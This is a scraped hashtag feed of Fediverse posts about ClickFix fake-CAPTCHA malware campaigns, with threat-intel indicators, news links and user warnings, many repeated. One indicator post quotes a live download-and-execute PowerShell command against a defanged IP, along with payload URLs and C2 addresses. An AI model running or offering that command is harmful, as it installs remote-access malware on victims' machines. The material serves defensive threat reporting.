#clickfix — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #clickfix, aggregated by home.social.
-
New.
ReliaQuest: ClickFix Evolves with PySoxy Proxying https://reliaquest.com/blog/threat-spotlight-clickfix-evolves-with-pysoxy-proxying/
More:
Infosecurity-Magazine: Attackers Combine ClickFix With PySoxy Proxying to Maintain Persistence https://www.infosecurity-magazine.com/news/clickfix-combined-pysoxy-proxying/ #infosec #Clickfix #threatresearch
-
'ClickFix' attack tricks users into hacking themselves, ACSC warns:
"Verify that you are human" prompt used to deliver Vidar Stealer malware.
The Australian Cyber Security Centre (ACSC) has stepped in to warn users of an active attack campaign targeting Windows users with Vidar Stealer malware, which is delivered through the so-called ClickFix social engineering technique.
#clickfix #acsc #malware #vidar #stealing #VidarStealer #australia #socialengineering
-
Microsoft researchers warn of a new #ClickFix campaign targeting macOS with fake guides on Medium and Craft to deploy AMOS and SHub Stealer via Terminal commands.
Read: https://hackread.com/fake-macos-troubleshooting-sites-steal-icloud-clickfix/
-
Wchodzisz na stronę juwenaliów… a tu taka niespodzianka [możliwa infekcja malware]
Patryk przesłał nam informację o infekcji strony rzeszowskiejuwenalia[.]pl Nasz czytelnik odwiedził tę stronę i natknął się na taki widok: Sam obrazek jeszcze niewiele zdradza, ale… po kliknięciu strona prosiła aby nacisnąć kolejno klawisze: Windows+R, Ctrl+V oraz enter. O co tutaj technicznie chodzi? Po kliknięciu: I’m not a robot – strona...
#WBiegu #Awareness #Clickfix #Infekcja #Malware #Socjotechnika
https://sekurak.pl/wchodzisz-na-strone-juwenaliow-a-tu-taka-niespodzianka-mozliwa-infekcja-malware/
-
ClickFix campaign uses fake macOS utilities lures to deliver infostealers - https://www.redpacketsecurity.com/clickfix-campaign-uses-fake-macos-utilities-lures-to-deliver-infostealers/
#threatintel
#macos
#clickfix
#infostealer
#payload-delivery
#persistence -
ClickFix campaign uses fake macOS utilities lures to deliver infostealers - https://www.redpacketsecurity.com/clickfix-campaign-uses-fake-macos-utilities-lures-to-deliver-infostealers/
#threatintel
#macos
#clickfix
#infostealer
#payload-delivery
#persistence -
ClickFix campaign uses fake macOS utilities lures to deliver infostealers - https://www.redpacketsecurity.com/clickfix-campaign-uses-fake-macos-utilities-lures-to-deliver-infostealers/
#threatintel
#macos
#clickfix
#infostealer
#payload-delivery
#persistence -
ClickFix campaign uses fake macOS utilities lures to deliver infostealers - https://www.redpacketsecurity.com/clickfix-campaign-uses-fake-macos-utilities-lures-to-deliver-infostealers/
#threatintel
#macos
#clickfix
#infostealer
#payload-delivery
#persistence -
ClickFix campaign uses fake macOS utilities lures to deliver infostealers - https://www.redpacketsecurity.com/clickfix-campaign-uses-fake-macos-utilities-lures-to-deliver-infostealers/
#threatintel
#macos
#clickfix
#infostealer
#payload-delivery
#persistence -
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
-
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
-
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
-
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
-
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
-
📢⚠️ New version of Vidar infostealer spreads via fake CAPTCHA, hides in JPEG and TXT files, uses fileless attacks, and steals browser and crypto wallet data.
Read: https://hackread.com/vidar-infostealer-fake-captchas-jpeg-txt-files/
-
Last Week on My Mac: Didn’t macOS have a GUI?
-
2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.
I'm still not sure what this #malware is yet, but it looks like a RAT.
Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html
-
2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.
I'm still not sure what this #malware is yet, but it looks like a RAT.
Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html
-
2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.
I'm still not sure what this #malware is yet, but it looks like a RAT.
Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html
-
2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.
I'm still not sure what this #malware is yet, but it looks like a RAT.
Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html
-
2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.
I'm still not sure what this #malware is yet, but it looks like a RAT.
Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html
-
macOS ClickFix Attacks Harvest Credentials via AppleScript Stealers
macOS users beware: a sneaky ClickFix campaign is using AppleScript stealers to harvest credentials from 14 browsers, 16 cryptocurrency wallets, and over 200 extensions. This targeted attack has already made off with a staggering amount of sensitive info - and it's still on the loose.
#Macos #Clickfix #Applescript #Infostealer #CredentialHarvesting
-
Last Week on My Mac: Root cause analysis and ClickFix
-
Last Week on My Mac: Root cause analysis and ClickFix
-
Last Week on My Mac: Root cause analysis and ClickFix
-
Охота на Emmenhtal: как мы восстановили полную kill chain банковского трояна с переформатированного диска
Разбираем реальный IR-кейс: ClickFix → Emmenhtal Loader → банковский троян с Telegram C2. Форензик переформатированного диска на 930 ГБ, VDM-дисамбигуация ложноположительных и восстановление артефактов из hibernation-файла.
https://habr.com/ru/articles/1021698/
#DFIR #форензика #malware_analysis #банковский_троян #Emmenhtal #ClickFix #threat_hunting #YARA #fileless_malware #incident_response
-
Охота на Emmenhtal: как мы восстановили полную kill chain банковского трояна с переформатированного диска
Разбираем реальный IR-кейс: ClickFix → Emmenhtal Loader → банковский троян с Telegram C2. Форензик переформатированного диска на 930 ГБ, VDM-дисамбигуация ложноположительных и восстановление артефактов из hibernation-файла.
https://habr.com/ru/articles/1021698/
#DFIR #форензика #malware_analysis #банковский_троян #Emmenhtal #ClickFix #threat_hunting #YARA #fileless_malware #incident_response
-
Охота на Emmenhtal: как мы восстановили полную kill chain банковского трояна с переформатированного диска
Разбираем реальный IR-кейс: ClickFix → Emmenhtal Loader → банковский троян с Telegram C2. Форензик переформатированного диска на 930 ГБ, VDM-дисамбигуация ложноположительных и восстановление артефактов из hibernation-файла.
https://habr.com/ru/articles/1021698/
#DFIR #форензика #malware_analysis #банковский_троян #Emmenhtal #ClickFix #threat_hunting #YARA #fileless_malware #incident_response
-
Охота на Emmenhtal: как мы восстановили полную kill chain банковского трояна с переформатированного диска
Разбираем реальный IR-кейс: ClickFix → Emmenhtal Loader → банковский троян с Telegram C2. Форензик переформатированного диска на 930 ГБ, VDM-дисамбигуация ложноположительных и восстановление артефактов из hibernation-файла.
https://habr.com/ru/articles/1021698/
#DFIR #форензика #malware_analysis #банковский_троян #Emmenhtal #ClickFix #threat_hunting #YARA #fileless_malware #incident_response
-
Forschende von Jamf Threat berichten heute über eine neue Variante einer bekannten Cyberangriffsmethode. Der Angriff zielt auf Mac-Nutzende ab und nutzt eine ziemlich geschickte Täuschung, um Schadsoftware auf den Mac zu schleusen.
Mehr: https://digiprax.maniabel.work/archiv/1248
#infostealer #AtomicStealer #jamf #infosec #up2date #macOS #ScriptEditor #ClickFix
-
2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.
A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at https://malware-traffic-analysis.net/2026/04/06/index.html
-
2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.
A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at https://malware-traffic-analysis.net/2026/04/06/index.html
-
2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.
A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at https://malware-traffic-analysis.net/2026/04/06/index.html
-
2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.
A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at https://malware-traffic-analysis.net/2026/04/06/index.html
-
2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.
A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at https://malware-traffic-analysis.net/2026/04/06/index.html
-
Beware CAPTCHA Scam
Fake "I'm not a robot" prompt tricks you. Don't press Win+R for ANY verification EVER!
Real CAPTCHA never asks to run commands or paste code. If "extra verification" has keyboard steps close the tab IMMEDIATELY! Stay safe!
-
Tiens, jolie trouvaille pour la saison de chasse 👀
Nouvelle évolution très graphique de #ClickFix, qui s’appuie cette fois sur WebDAV pour délivrer le payload. (!)
Ça change un peu des chaînes directes habituelles en PowerShell / MSHTA / WScript : ici, l’accès initial passe par >net use, montage du partage distant, exécution du batch comme un fichier local, puis démontage.
Cible : Windows uniquement.
Le move est intéressant : moins de dépendance aux interpréteurs/lolbins ultra-monitorés, et un abus de WebDAV qui peut passer plus discrètement si ce n’est pas surveillé.
Source du finding Daniel
👇
https://www.linkedin.com/posts/daniel-b1_clickfix-webdav-atos-ugcPost-7441043660613398528-98eyAnalyse Atos
👇
https://atos.net/en/lp/cybershield/investigating-a-new-click-fix-variantPour ceux qui veulent enrichir la détection / le blocage :
la petite liste à zigouiller dans vos firewalls et filtres DNS
👇
https://threatfox.abuse.ch/browse/tag/WebDav/Et en bonus : recette de chasse / pivot en image via Onyphe.
Et en bonus : recette de chasse / pivot en image via #Onyphe.
-
Nowy wariant metody ClickFix – cyberprzestępcy rezygnują z Win+R na rzecz Win+X i Terminala Windows
Badacze bezpieczeństwa z Microsoft Defender ostrzegają przed nowym wariantem kampanii malware, w której cyberprzestępcy za pomocą phishingu nakłaniają użytkowników do instalacji złośliwego oprogramowania typu infostealer (Lumma Stealer). Atak opiera się na technice ClickFix, polegającej na przekonaniu użytkownika do uruchomienia złośliwych poleceń PowerShell.TLDR: Schemat ataku jest dosyć prosty. Korzystając z socjotechniki...
#Aktualności #Clickfix #LummaStealer #Microsoft #Windows #WindowsDefender
-
ISC diary: #SmartApeSG campaign uses #ClickFix page to push #Remcos #RAT (#RemcosRAT) https://isc.sans.edu/diary/32796
-
ISC diary: #SmartApeSG campaign uses #ClickFix page to push #Remcos #RAT (#RemcosRAT) https://isc.sans.edu/diary/32796
-
ISC diary: #SmartApeSG campaign uses #ClickFix page to push #Remcos #RAT (#RemcosRAT) https://isc.sans.edu/diary/32796
-
A 'Free Photoshop' scam on #TikTok is stealing people's data: https://zorz.it/OABup
#JeremyGray #FreePhotoshop #AdobePhotoshop #ClickFix #CyberCriminals #Microsoft #Photoshop #scam #SocialMedia
-
Kolejna odsłona ClickFix – tym razem podszywa się pod Cloudflare
Treść: ClickFix to atak socjotechniczny, który nakłania użytkowników do uruchamiania złośliwych poleceń na ich własnych urządzeniach. Kilka dni temu atakowano w ten sposób użytkowników strony psychologiadziecka[.]org, jednak o pierwszych tego typu atakach ostrzegaliśmy już w 2024 roku. TLDR: Większość kampanii działa według podobnego schematu – użytkownikowi wyświetlany jest fałszywy (ale...
#Aktualności #Teksty #CAPTCHA #Clickfix #Cloudflare #Malware
https://sekurak.pl/kolejna-odslona-clickfix-tym-razem-podszywa-sie-pod-cloudflare/
-
📬 ClickFix Malware-Kampagne: Fake-Cloudflare-Check installiert unbemerkt MIMICRAT
#ITSicherheit #Malware #AMSIBypass #ClickFix #ETWBypass #FilelessMalware #MIMICRAT #PowerShell #ReflectiveLoading #RemoteAccessTrojaner #socialengineering #WindowsMalware https://sc.tarnkappe.info/0dde49 -
📬 ClickFix Malware-Kampagne: Fake-Cloudflare-Check installiert unbemerkt MIMICRAT
#ITSicherheit #Malware #AMSIBypass #ClickFix #ETWBypass #FilelessMalware #MIMICRAT #PowerShell #ReflectiveLoading #RemoteAccessTrojaner #socialengineering #WindowsMalware https://sc.tarnkappe.info/0dde49 -
📬 ClickFix Malware-Kampagne: Fake-Cloudflare-Check installiert unbemerkt MIMICRAT
#ITSicherheit #Malware #AMSIBypass #ClickFix #ETWBypass #FilelessMalware #MIMICRAT #PowerShell #ReflectiveLoading #RemoteAccessTrojaner #socialengineering #WindowsMalware https://sc.tarnkappe.info/0dde49 -
📬 ClickFix Malware-Kampagne: Fake-Cloudflare-Check installiert unbemerkt MIMICRAT
#ITSicherheit #Malware #AMSIBypass #ClickFix #ETWBypass #FilelessMalware #MIMICRAT #PowerShell #ReflectiveLoading #RemoteAccessTrojaner #socialengineering #WindowsMalware https://sc.tarnkappe.info/0dde49 -
📬 ClickFix Malware-Kampagne: Fake-Cloudflare-Check installiert unbemerkt MIMICRAT
#ITSicherheit #Malware #AMSIBypass #ClickFix #ETWBypass #FilelessMalware #MIMICRAT #PowerShell #ReflectiveLoading #RemoteAccessTrojaner #socialengineering #WindowsMalware https://sc.tarnkappe.info/0dde49 -
📬 Google sieht Staatshacker mit Gemini in der Vorbereitung
#Cyberangriffe #KünstlicheIntelligenz #ClickFix #COINBAIT #Gemini #HONESTCUE #OSINT #Staatshacker #UNC2970 https://sc.tarnkappe.info/23b4e2
